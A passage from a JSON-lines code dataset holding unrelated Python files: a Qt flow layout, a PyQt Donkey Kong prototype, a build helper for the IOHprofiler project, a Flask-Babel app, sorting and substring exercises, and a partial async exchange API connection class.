split:\r\n popularWordsSat.append(word)\r\n\r\ntopHundredWordsSat = Counter(popularWordsSat).most_common(100)\r\n\r\n#top Emojis on Monday\r\npopularEmojisSat = []\r\nfor x in messagesOnSaturday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisSat.append(character);\r\n\r\ntopHundredEmojisSat = Counter(popularEmojisSat).most_common(100)\r\n## End Analysis Script","repo_name":"meghanmc/cs4980_project","sub_path":"analyze_script.py","file_name":"analyze_script.py","file_ext":"py","file_size_in_byte":11834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6551444423","text":"#----------------------------------------------------------------------\n\n # Libraries\nfrom PySide6.QtWidgets import QSizePolicy, QLayout\nfrom PySide6.QtCore import Qt, QRect, QSize, QPoint\n#----------------------------------------------------------------------\n\n # Class\nclass QFlowLayout(QLayout):\n def __init__(self, parent = None, orientation = Qt.Orientation.Horizontal, spacing = -1):\n super().__init__(parent)\n self.orientation = orientation\n\n self.setContentsMargins(0, 0, 0, 0)\n\n self.setSpacing(spacing)\n\n self._item_list = []\n\n def __del__(self):\n item = self.takeAt(0)\n while item:\n item = self.takeAt(0)\n\n def addItem(self, item):\n self._item_list.append(item)\n\n # def addWidget(self, widget):\n # self.addItem(QWidgetItem(widget))\n\n def count(self):\n return len(self._item_list)\n\n def itemAt(self, index):\n if index >= 0 and index < len(self._item_list):\n return self._item_list[index]\n\n return None\n\n def takeAt(self, index):\n if index >= 0 and index < len(self._item_list):\n return self._item_list.pop(index)\n\n return None\n\n def expandingDirections(self):\n return Qt.Orientation(0)\n\n def hasHeightForWidth(self):\n return self.orientation == Qt.Orientation.Horizontal\n\n def heightForWidth(self, width):\n return self._do_layout(QRect(0, 0, width, 0), True)\n\n def hasWidthForHeight(self):\n return self.orientation == Qt.Orientation.Vertical\n\n def widthForHeight(self, height):\n return self._do_layout(QRect(0, 0, 0, height), True)\n\n def setGeometry(self, rect):\n super().setGeometry(rect)\n self._do_layout(rect, False)\n\n def sizeHint(self):\n return self.minimumSize()\n\n def minimumSize(self):\n size = QSize()\n\n for item in self._item_list:\n size = size.expandedTo(item.minimumSize())\n\n margin, _, _, _ = self.getContentsMargins()\n\n size += QSize(2 * margin, 2 * margin)\n return size\n\n def _do_layout(self, rect, testOnly) -> int:\n x = rect.x()\n y = rect.y()\n line_height = column_width = height_for_width = 0\n\n for item in self._item_list:\n wid = item.widget()\n space_x = self.spacing() + wid.style().layoutSpacing(QSizePolicy.ControlType.PushButton, QSizePolicy.ControlType.PushButton, Qt.Orientation.Horizontal)\n space_y = self.spacing() + wid.style().layoutSpacing(QSizePolicy.ControlType.PushButton, QSizePolicy.ControlType.PushButton, Qt.Orientation.Vertical)\n if self.orientation == Qt.Orientation.Horizontal:\n nextX = x + item.sizeHint().width() + space_x\n if nextX - space_x > rect.right() and line_height > 0:\n x = rect.x()\n y = y + line_height + space_y\n nextX = x + item.sizeHint().width() + space_x\n line_height = 0\n\n if not testOnly:\n item.setGeometry(QRect(QPoint(x, y), item.sizeHint()))\n\n x = nextX\n line_height = max(line_height, item.sizeHint().height())\n else:\n next_y = y + item.sizeHint().height() + space_y\n if next_y - space_y > rect.bottom() and column_width > 0:\n x = x + column_width + space_x\n y = rect.y()\n next_y = y + item.sizeHint().height() + space_y\n column_width = 0\n\n height_for_width += item.sizeHint().height() + space_y\n if not testOnly:\n item.setGeometry(QRect(QPoint(x, y), item.sizeHint()))\n\n y = next_y\n column_width = max(column_width, item.sizeHint().width())\n\n if self.orientation == Qt.Orientation.Horizontal:\n return y + line_height - rect.y()\n else:\n return height_for_width - rect.y()\n#----------------------------------------------------------------------\n","repo_name":"Synell/OGE-Next","sub_path":"data/lib/qtUtils/QFlowLayout.py","file_name":"QFlowLayout.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"14992825902","text":"import sys\nimport MainWindow\n\nfrom PyQt5.QtWidgets import QWidget, QApplication, QGridLayout, QPushButton, QGroupBox, QVBoxLayout, QLabel, \\\n QDesktopWidget, QGraphicsView, QGraphicsScene, QGraphicsRectItem, QMainWindow, QGraphicsEllipseItem\n\nfrom PyQt5.QtCore import Qt, QRectF\n\n\nclass GameWindow(QMainWindow):\n def __init__(self, parent=None):\n super(GameWindow, self).__init__(parent)\n\n # enables key event handling\n self.setFocusPolicy(Qt.StrongFocus)\n self.keys_pressed = set()\n\n self.size = 32\n self.setWindowTitle('Donkey Kong')\n self.setGeometry(300, 150, 10*self.size + 5, 20*self.size + 5)\n self.is_game_over = False\n\n self.center()\n self.scene = QGraphicsScene(self)\n view = QGraphicsView(self.scene)\n self.setCentralWidget(view)\n\n self.design = [['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'e', 'b', 'b', 'l', 'b', 'b', 'e', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'l', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'l', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'l', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'l', 'e', 'e', 'e', 'e'],\n ['b', 'b', 'l', 'b', 'b', 'l', 'b', 'b', 'e', 'e'],\n ['e', 'e', 'l', 'e', 'e', 'e', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'l', 'e', 'e', 'e', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'l', 'e', 'e', 'e', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'l', 'b', 'b', 'b', 'b', 'b', 'l', 'b'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'l', 'b']]\n # e - empty, b - beam, l - ladder\n\n self.drawScene()\n\n self.player = QGraphicsEllipseItem(9*self.size, 19*self.size, self.size, self.size)\n self.player.setBrush(Qt.green)\n self.player_i = 9\n self.player_j = 19\n self.scene.addItem(self.player)\n\n self.show()\n\n # - when key is pressed\n def keyPressEvent(self, event):\n # self.keys_pressed.add(event.key())\n key = event.key()\n\n if key == Qt.Key_A:\n if (self.player_i - 1) > -1:\n if self.design[self.player_j][self.player_i-1] == 'b' or self.design[self.player_j][self.player_i-1] == 'l':\n self.player_i -= 1\n self.player.setX(self.player.x()-32)\n\n if key == Qt.Key_D:\n if (self.player_i + 1) < 10:\n if self.design[self.player_j][self.player_i+1] == 'b' or self.design[self.player_j][self.player_i+1] == 'l':\n self.player_i += 1\n self.player.setX(self.player.x()+32)\n\n if key == Qt.Key_W:\n if (self.player_j - 1) > -1:\n if self.design[self.player_j - 1][self.player_i] == 'l':\n self.player_j -= 1\n self.player.setY(self.player.y()-32)\n\n if key == Qt.Key_S:\n if (self.player_j + 1) < 20:\n if self.design[self.player_j + 1][self.player_i] == 'l':\n self.player_j += 1\n self.player.setY(self.player.y() + 32)\n\n def center(self):\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def drawScene(self):\n for i in range(20):\n for j in range(10):\n newRect = QGraphicsRectItem(QRectF(j*32, i*32, self.size, self.size))\n if self.design[i][j] == 'e':\n newRect.setBrush(Qt.black)\n elif self.design[i][j] == 'b':\n newRect.setBrush(Qt.red)\n elif self.design[i][j] == 'l':\n newRect.setBrush(Qt.magenta)\n\n self.scene.addItem(newRect)\n\n\nclass MainMenu(QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.size = 64\n self.setWindowTitle('Golden Banana')\n self.setGeometry(300, 150, 15 * self.size, 11 * self.size)\n self.center()\n\n # coloring\n self.setAutoFillBackground(True)\n p = self.palette()\n p.setColor(self.backgroundRole(), Qt.black)\n self.setPalette(p)\n\n self.widget1 = QPushButton('Single Player')\n self.widget2 = QPushButton('Multiplayer')\n self.widget3 = QPushButton('Exit')\n self.createGridLayout()\n windowLayout = QVBoxLayout()\n windowLayout.addWidget(self.horizontalGroupBox)\n self.setLayout(windowLayout)\n\n self.widget1.clicked.connect(self.on_pushSinglePlayerButton_clicked)\n\n\n self.widget3.clicked.connect(self.on_pushExitButton_clicked)\n\n self.show()\n\n def on_pushExitButton_clicked(self):\n self.close()\n\n def on_pushSinglePlayerButton_clicked(self):\n self.dialog = GameWindow()\n self.dialog.show()\n self.close()\n\n def center(self):\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n\n def createGridLayout(self):\n self.horizontalGroupBox = QGroupBox(\"\")\n layout = QGridLayout()\n\n self.widget1.setFixedSize(200, 30)\n self.widget2.setFixedSize(200, 30)\n self.widget3.setFixedSize(200, 30)\n\n layout.addWidget(self.widget1, 5, 0)\n layout.addWidget(self.widget2, 6, 0)\n layout.addWidget(self.widget3, 7, 0)\n layout.addWidget(QLabel(\" \"), 0, 1)\n #layout.addWidget(QLabel(\" \"), 4, 1)\n #layout.addWidget(QLabel(\" \"), 5, 1)\n layout.addWidget(QLabel(\" \"), 6, 1)\n\n self.horizontalGroupBox.setLayout(layout)\n\n\n#if __name__ == '__main__':\n#\n # app = QApplication(sys.argv)\n # ex = MainMenu()\n # sys.exit(app.exec_())\n","repo_name":"n-miletic/DRS2019","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":6489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24242487663","text":"#! /usr/bin/python2.5 -tt\n\n# Problem Set 3\n# Name: Anna Liu\n# Collaborators: N/A\n# Time: 00:20:00\n# Date: 09/04/2014\n\n# count the number 'key' in the 'target' string.\n\n\ndef countSubStringMatch(target, key):\n location = count = 0\n while location < len(target):\n i = str.find(target, key, location)\n if i >= 0:\n count += 1\n location = (i + len(key))\n else:\n break\n return count\n\n\ndef countSubStringMatchRecursive(target, key):\n count = 0\n i = str.find(target, key)\n if i >= 0:\n target = target[i+len(key):]\n count += 1 + countSubStringMatchRecursive(target, key)\n return count\n\n","repo_name":"liuouya/MIT_6.00_assignments","sub_path":"ps3a.py","file_name":"ps3a.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42244809630","text":"#!/usr/bin/env python\n## -*- mode: python -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\nimport os\nfrom os.path import join\nimport shutil\nimport tempfile\nimport subprocess\nfrom subprocess import STDOUT\nimport platform\nimport time\nimport glob\n\n\n## Change to the root directory of repository and add our tools/\n## subdirectory to system wide search path for modules.\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, os.path.abspath(join('code-experiments', 'tools')))\n\nfrom amalgamate import amalgamate\nfrom cocoutils import make, run, python, check_output\nfrom cocoutils import copy_file, expand_file, write_file\nfrom cocoutils import git_version, git_revision\n\nCORE_FILES = ['code-experiments/src/profiler/IOHprofiler_random.c',\n 'code-experiments/src/profiler/IOHprofiler_suite.c',\n 'code-experiments/src/profiler/IOHprofiler_observer.c',\n ]\n\n_verbosity = False\n\n################################################################################\n## C\ndef build_c():\n \"\"\" Builds the C source code \"\"\"\n global RELEASE\n amalgamate(CORE_FILES + ['code-experiments/src/profiler/IOHprofiler_runtime_c.c'],\n 'code-experiments/build/c/IOHprofiler.c', RELEASE,\n {\"IOHprofiler_VERSION\": git_version(pep440=True)})\n expand_file('code-experiments/src/profiler/IOHprofiler.h', 'code-experiments/build/c/profiler/IOHprofiler.h',\n {\"IOHprofiler_VERSION\": git_version(pep440=True)})\n write_file(git_revision(), \"code-experiments/build/c/REVISION\")\n write_file(git_version(), \"code-experiments/build/c/VERSION\")\n if 11 < 3:\n python('code-experiments/build/c', ['make.py', 'clean'], verbose=_verbosity)\n python('code-experiments/build/c', ['make.py', 'all'], verbose=_verbosity)\n else:\n make(\"code-experiments/build/c\", \"clean\", verbose=_verbosity)\n make(\"code-experiments/build/c\", \"all\", verbose=_verbosity)\n\n\ndef run_c_example():\n \"\"\" Builds and runs the example experiment in C \"\"\"\n build_c()\n try:\n run('code-experiments/build/c', ['./example_experiment'], verbose=_verbosity)\n except subprocess.CalledProcessError:\n sys.exit(-1)\n\ndef run_c():\n \"\"\" Builds and runs the example experiment in C \"\"\"\n build_c()\n try:\n run('code-experiments/build/c', ['./user_experiment'], verbose=_verbosity)\n except subprocess.CalledProcessError:\n sys.exit(-1)\n\n\n################################################################################\n## Python 2\ndef _prep_python():\n global RELEASE\n amalgamate(CORE_FILES + ['code-experiments/src/IOHprofiler_runtime_c.c'],\n 'code-experiments/build/python/cython/IOHprofiler.c',\n RELEASE, {\"IOHprofiler_VERSION\": git_version(pep440=True)})\n expand_file('code-experiments/src/IOHprofiler.h',\n 'code-experiments/build/python/cython/IOHprofiler.h',\n {'IOHprofiler_VERSION': git_version(pep440=True)})\n copy_file('code-experiments/build/python/README.md',\n 'code-experiments/build/python/README.txt')\n expand_file('code-experiments/build/python/setup.py.in',\n 'code-experiments/build/python/setup.py',\n {'IOHprofiler_VERSION': git_version(pep440=True)}) # hg_version()})\n # if 'darwin' in sys.platform: # a hack to force cythoning\n # run('code-experiments/build/python/cython', ['cython', 'interface.pyx'])\n\n\ndef build_python():\n _prep_python()\n ## Force distutils to use Cython\n # os.environ['USE_CYTHON'] = 'true'\n # python('code-experiments/build/python', ['setup.py', 'sdist'])\n # python(join('code-experiments', 'build', 'python'), ['setup.py', 'install', '--user'])\n python(join('code-experiments', 'build', 'python'), ['setup.py', 'install', '--user'])\n # os.environ.pop('USE_CYTHON')\n\n\ndef run_python_example():\n \"\"\" Builds and installs the Python module `IOHprofiler_python` and runs the\n `example_experiment.py` as a simple test case. \"\"\"\n build_python()\n try:\n python(os.path.join('code-experiments', 'build', 'python'),\n ['example_experiment.py'])\n except subprocess.CalledProcessError:\n sys.exit(-1)\n\ndef run_python():\n \"\"\" Builds and installs the Python module `IOHprofiler_python` and runs the\n `example_experiment.py` as a simple test case. \"\"\"\n build_python()\n try:\n python(os.path.join('code-experiments', 'build', 'python'),\n ['user_experiment.py'])\n except subprocess.CalledProcessError:\n print(\"error\")\n sys.exit(-1)\n\n\n################################################################################\n## Global\ndef build():\n builders = [\n build_c,\n build_python,\n ]\n for builder in builders:\n try:\n builder()\n except:\n failed = str(builder)\n print(\"============\")\n print(' ERROR: %s failed, call \"./do.py %s\" individually'\n % (failed, failed[failed.find('build_'):].split()[0]) +\n ' for a more detailed error report')\n print(\"============\")\n\n\ndef run_all():\n run_c()\n run_python()\n\n\n\ndef verbose(args):\n global _verbosity\n _verbosity = True\n main(args)\n _verbosity = False\n\ndef help():\n print(\"\"\"IOHprofiler framework bootstrap tool. Version %s\n\nUsage: do.py \n\n\nAvailable commands for users:\n\n build-c - Build C module\n build-python - Build Python modules\n\n run-c - Build and run example experiment in C\n run-python - Build and run example experiment in Python\n\nAvailable commands for developers:\n\n build - Build C and Python modules\n run - Run example experiments in C and Python\n\n\"\"\" % git_version(pep440=True))\n\n\ndef main(args):\n if len(args) < 1:\n help()\n sys.exit(0)\n cmd = args[0].replace('_', '-').lower()\n if cmd == 'build': build()\n elif cmd == 'run': run_all()\n elif cmd == 'build-c': build_c()\n elif cmd == 'build-python': build_python()\n elif cmd == 'run-c': run_c()\n elif cmd == 'run-c-example': run_c_example()\n elif cmd == 'run-python': run_python()\n elif cmd == 'run-python-example': run_python_example()\n else: help()\n\n\nif __name__ == '__main__':\n RELEASE = os.getenv('IOHprofiler_RELEASE', 'false') == 'true'\n main(sys.argv[1:])\n","repo_name":"qifanyyy/JupyterNotebook","sub_path":"new_algs/Sequence+algorithms/Selection+algorithm/do.py","file_name":"do.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"27"} +{"seq_id":"29944434935","text":"#!/usr/bin/env python3\n\"\"\" This module is for a simple flask appth Babel \"\"\"\nfrom flask import (\n Flask,\n render_template,\n)\nfrom flask_babel import Babel\nfrom typing import Any\n\n\nclass Config(object):\n \"\"\" Configuration class for babel presets \"\"\"\n LANGUAGES = [\"en\", \"fr\"]\n BABEL_DEFAULT_LOCALE = \"en\"\n BABEL_DEFAULT_TIMEZONE = \"UTC\"\n\n\napp = Flask(__name__)\napp.config.from_object(Config)\n\nbabel = Babel(app)\n\n\n@app.route('/', strict_slashes=False)\ndef home() -> Any:\n \"\"\" Home page of the application \"\"\"\n return render_template('1-index.html')\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=\"5000\")\n","repo_name":"Jesulayomy/alx-backend","sub_path":"0x02-i18n/1-app.py","file_name":"1-app.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19574552265","text":"import sys\nimport math\nimport string\nfrom sort_algos import merge_sort, selection_sort\n\n\ndef prepare_data(path):\n with open(path, encoding='utf-8') as f:\n data = f.read()\n\n trans_table = str.maketrans({key: None for key in string.punctuation})\n new_data = data.translate(trans_table)\n return new_data.split()\n\n\ndef main(a_or_b):\n words = prepare_data('the_adventures_of_sherlock_holmes.txt')\n # words = words[:10000]\n n = len(words)\n\n if a_or_b == 'a':\n print('The book contains {} words'.format(n))\n print('Sort algorithm A, O(n log n)')\n merge_sort(words)\n # print(words)\n else:\n print('----------------------------------------------------')\n print('Sort algorithm B, O(n**2)')\n selection_sort(words)\n print(words)\n\n\nif __name__ == '__main__':\n main(sys.argv[1])\n","repo_name":"hklb94/qualification-seminar-materials-2018","sub_path":"session-7/sorting_experiment.py","file_name":"sorting_experiment.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"3248369214","text":"#from mda.core.base.receivers.rest.connection import *\nimport numpy as np\nfrom itertools import count as sequence\n\nfrom time_funcs import dtHttp_to_dt64\n\n\n#print('reloading_conn')\n\n\n'''\nHTTP 4XX return codes are used for malformed requests; the issue is on the sender's side.\nHTTP 403 return code is used when the WAF Limit (Web Application Firewall) has been violated.\nHTTP 429 return code is used when breaking a request rate limit.\nHTTP 418 return code is used when an IP has been auto-banned for continuing to send requests after receiving 429 codes.\nHTTP 5XX return codes are used for internal errors; the issue is on Binance's side.\nWith using /wapi/v3 , HTTP 504 return code is used when the API successfully sent the message but not get a response within the timeout period. It is important to NOT treat this as a failure operation; the execution status is UNKNOWN and could have been a success.\n\n\n{\n \"code\":-1121,\n \"msg\":\"Invalid symbol.\"\n}\n\n\n'''\nimport pickle as pl\nimport inspect\nimport os.path\n\nfrom aiohttp import ClientSession\nfrom aiohttp.client_exceptions import ClientConnectorError\n#import ClientConnectorError\nimport time\nimport asyncio\n\nimport asyncio\nimport time\nfrom copy import deepcopy\nfrom inspect import iscoroutinefunction\n\n# from mda.core.base.receivers.response_tps import *\t# OPEN, CLOSE, DATA, ERROR, SUCCESS, DECODE_ERROR\n\n\n'''\nasync def callback_example(result, id):\n\tpass\n'''\n\n\ndef connect_deco(method):\n\tasync def connect_wrapper(self, *args, **kwargs):\n\t\tif self.connected or self.closed:\n\t\t\traise Exception('method \"connect\" has already been used')\n\n\t\tawait method(self, *args, **kwargs)\n\n\t\tself.connected = True\n\n\t# await self.callback({'tp': 'open', 'data': None, 'tm': time.time()})\n\n\treturn connect_wrapper\n\n\ndef disconnect_deco(method):\n\tasync def disconnect_wrapper(self, *args, **kwargs):\n\t\tif self.closed:\n\t\t\traise Exception('connection already closed')\n\t\tself.closed = True\n\t\tawait method(self, *args, **kwargs)\n\n\t# await self.callback({'tp': 'close', 'data': None, 'tm': time.time()})\n\n\treturn disconnect_wrapper\n\n\ndef low_deco(method):\n\tdef wrapper(self, *args, **kwargs):\n\t\trequests_params = method(self, *args, **kwargs)\n\t\treturn self.req_low(requests_params)\n\n\treturn wrapper\n\n\nclass Connection_base():\n\tconnect_params = {}\n\n\tdef __init__(self, callback, do_not_return=None, auto_connect=False, connect_params=None):\n\t\t'''\n\t\tcallback:coroutine\n\t\tauto_connect:bool\t//True - calling the \"connect\" method is not required, at the start of requests, \"connect\" will be called automatically,\n\t\t\t\t\t//False - call \"connect\" is required\n\t\tauto_disconect\t\t//??\n\n\t\t'''\n\t\tself.id_sequence=sequence(1)\n\t\tself.closed = False\n\t\tself.active = False\n\t\tself.connected = False\n\t\tself.conn = None\n\t\tself.conn_coro = None\n\n\t\tself.callback = callback\n\t\tself.do_now_return = (\n\t\t\tdo_not_return if isinstance(do_not_return, list) else [do_not_return]) if do_not_return else []\n\t\tself.auto_connect = auto_connect\n\t\t# self.auto_disconect = auto_disconnect\n\n\t\tself.connect_params = deepcopy(self.connect_params)\n\t\tif connect_params:\n\t\t\tfor key, value in connect_params.items():\n\t\t\t\tself.connect_params[key] = value\n\n\t# {CONNECTION_CONTROL_INTERFACE}\n\n\t@connect_deco\n\tasync def connect(self, **connect_params):\n\t\traise NotImplementedError\n\n\t@disconnect_deco\n\tasync def disconnect(self):\n\t\traise NotImplementedError\n\n\tdef is_ready(self):\n\t\t'''\n\t\t1.готово ли соендиение к подпискам\n\t\t'''\n\t\treturn self.is_connected() and not self.closed\n\n\tdef is_active(self):\n\t\t'''\n\t\t1.готово ли соендиение к подпискам(частный случай is_ready), но в отличии от is_ready еще показывает, что соендинение фактически функционирует\n\t\t'''\n\t\tif self.active:\n\t\t\treturn True\n\n\tdef is_connected(self):\n\t\t'''\n\t\t1.показывает надобность в connect\n\t\t'''\n\t\treturn self.connected or self.auto_connect\n\n\tdef is_closed(self):\n\t\t'''\n\t\t1. показывает что соендинение не было сброшенно\n\t\t'''\n\t\treturn self.closed\n\n\t##{INTERNAL}\n\tdef get_url(self, **params):\n\t\treturn self.url\n\n\tdef decode(self, raw):\n\t\traise NotImplementedError\n\n\t# def parse(self, msg):\n\t# return self.parser.parse(msg)\n\n\t# async def handle(self, raw):\n\t#\ttry:\n\t#\t\tdecoded=self.decode(msg)\n\t#\texcept:\n\n\t# def handle(self, raw):\n\t#\tdecoded = self.decode(msg)\n\t# parsed = self.parsed(decoded)\n\t#\treturn parsed\n\n\t# def parse(self, msg):\n\t#\traise NotImplementedError\n\n\tdef generate_requests(self, requests_params):\n\t\traise NotImplementedError\n\n\tdef send_request(self, request):\n\t\traise NotImplementedError\n\n\t# await def run(self):\n\t#\traise NotImplementedError\n\n\t#\n\n\t# {REQUESTS_INTERFACE}\n\t##{LOW}\n\n\tdef req_low(self, requests_params, callback=None, timeout=None):\n\t\t'''\n\t\tcallback: func(msg, id) or None\n\t\t'''\n\t\tif self.closed:\n\t\t\traise Exception('the connection was closed')\n\t\tif not self.connected:\n\t\t\traise Exception('connection not yet open')\n\n\t\tfutures = None\n\n\t\tif isinstance(requests_params, list):\n\t\t\tout_is_list = True\n\t\telse:\n\t\t\tout_is_list = False\n\t\t\trequests_params = [requests_params]\n\n\t\ttrack_ids = [next(self.id_sequence) for i in range(len(requests_params))]\n\t\t#print(requests_params)\n\t\trequests= self.generate_requests(requests_params)\n\t\t\n\t\t#print(requests)\n\t\tif callback or self.callback:\n\t\t\tif callback:\n\t\t\t\tcallbacks = [self.get_tracked_callback(callback, track_id) for track_id in track_ids]\n\t\t\telse:\n\t\t\t\tcallbacks = [self.get_tracked_callback(self.callback, track_id) for track_id in track_ids]\n\t\t\n\t\telse:\n\t\t\tfutures = [asyncio.Future() for i in range(len(requests_params))]\n\t\t\tcallbacks = [future.set_result for future in futures]\n\n\t\tfor request, callback, track_id, request_params in zip(requests, callbacks, track_ids, requests_params):\n\t\t\tself.send_request(request, callback, track_id, request_params, timeout)\n\n\t\tif futures:\n\t\t\tif out_is_list:\n\t\t\t\treturn futures\n\t\t\telse:\n\t\t\t\t return futures[0]\n\t\tif out_is_list:\n\t\t\treturn track_ids\n\t\telse:\n\t\t\treturn track_ids[0]\n\n\n\tdef get_tracked_callback(self, callback, track_id):\n\t\tdef callback_tracked(msg):\n\t\t\treturn callback(msg, track_id=track_id)\n\n\t\treturn callback_tracked\n\n\n\t##\n\t##{HIGH}\n\t@low_deco\n\tdef sub_trades_up(self, market_s, **params):\n\t\treturn self.get_requests_params('sub', 'trades', True, market_s, **params)\n\n\n\t@low_deco\n\tdef sub_orderbook_up(self, market_s, ** params):\n\t\treturn self.get_requests_params('sub', 'deltas', True, market_s, **params)\n\n\n\t@low_deco\n\tdef sub_tickers_C(self, market_s=None, **params):\n\t\treturn self.get_requests_params('sub', 'tickers_C', False, market_s, **params)\n\n\n\t@low_deco\n\tdef sub_tickers_CHL(self, market_s=None, **params):\n\t\treturn self.get_requests_params('sub', 'tickers_CHL', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_orderbook(self, market_s, **params):\n\t\treturn self.get_requests_params('get', 'orderbook', True, market_s, **params)\n\n\n\t@low_deco\n\tdef get_trades(self, market_s, **params):\n\t\treturn self.get_requests_params('get', 'trades', True, market_s, **params)\n\n\n\t@low_deco\n\tdef get_tickers_C(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'tickers_C', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_tickers_CHL(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'tickers_CHL', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_pong(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'pong', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_trades(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'trades', True, market_s, **params)\n\n\n\t@low_deco\n\tdef get_orderbook(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'orderbook', True, market_s, **params)\n\n\n\t@low_deco\n\tdef get_tickers_CHL(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'tickers_CHL', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_tickers_C(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'tickers_C', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_markets(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'markets', False, market_s, **params)\n\n\n\t@low_deco\n\tdef sub_ohlcv_up(self, market_s, **params):\n\t\treturn self.get_requests_params('get', 'ohlcv_up', True, market_s, **params)\n\n\t@low_deco\n\tdef get_ohlcv(self, market_s, **params):\n\t\t#print(params)\n\t\treturn self.get_requests_params('get', 'ohlcv', True, market_s, **params)\n\n\n\t###{INTERNAL}\n\tdef get_requests_params(self, req_tp, data_tp, market_required, market_s, **params):\n\t\tif not market_required:\n\t\t\tif not market_s:\n\t\t\t\trequest_info = {'req_tp': req_tp, 'data_tp': data_tp, **params}\n\t\t\t\treturn request_info\n\n\t\tif not isinstance(market_s, list):\n\t\t\tmarket_s = [market_s]\n\t\t# market_s = [self.market_to_exfrmt(market) for market in market_s]\n\n\t\trequests_params = []\n\t\tfor market in market_s:\n\t\t\trequest_info = {'req_tp': req_tp, 'data_tp': data_tp, 'market': market, **params}\n\t\t\trequests_params.append(request_info)\n\t\treturn requests_params\n\n\n\t###\n\t##\n\t#\n\n\n# from mda.core.base.receivers.response_tps import *\t# OPEN, CLOSE, DATA, ERROR, SUCCESS, DECODE_ERROR\n# from mda.core.base.receivers.rest.error_tps import * # NOT_CONNECTION, UNKNOWN, REQUESTS_TIMEOUT, INVALID_REQUEST, INVALID_MARKET\n\nclass SymbolParsingError(Exception):\n\tpass\n\nclass Connection_rest(Connection_base):\n\tconnect_params = {}\n\tsemaphore_value = 1000\n\t# session=None\n\tsemaphore = None\n\tfrom_request_to_request_params = {}\n\n\tincoming_msgs = [\n\t\t'data',\n\t\t'error',\n\t\t'decode_error'\n\n\t]\n\n\tdata_tps = [\n\t\t'orderbook',\n\t\t'trades',\n\t\t'tickers_C',\n\t\t'tickers_CHL',\n\t\t'markets',\n\t\t'ohlcv'\n\t]\n\n\terror_tps = [\n\t\t'network_down',\n\t\t'too_many_requests',\n\t\t'invalid_market',\n\t\t'service_unavailable',\n\t\t'repeat',\n\t\t'unknown_error'\n\t]\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args,**kwargs)\n\t\n\t\tself.get_tasks = {}\n\t\tself.basequote_map = {}\n\t\t#self.quotebase_map = {}\n\n\t\tself.on_incoming_msgs_methods = {msg_tp: getattr(self, 'parse_%s' % msg_tp) for msg_tp in self.incoming_msgs}\n\t\tself.on_data_methods = {data_tp: getattr(self, 'parse_data_%s' % data_tp) for data_tp in self.data_tps}\n\n\n\t\t#\n\t\tself.request_coros=set()\n\n\t# self.on_error_methods = {error_tp: getattr(self, 'parse_%s' % error_tp) for error_tp in self.error_tps}\n\n\t@connect_deco\n\tasync def connect(self, decode=True, parse=True, **connect_params):\n\t\t'''\n\n\t\t'''\n\t\tself.active = True\n\t\tself.semaphore = asyncio.Semaphore(self.semaphore_value)\n\t\tself.session = ClientSession(timeout=60, 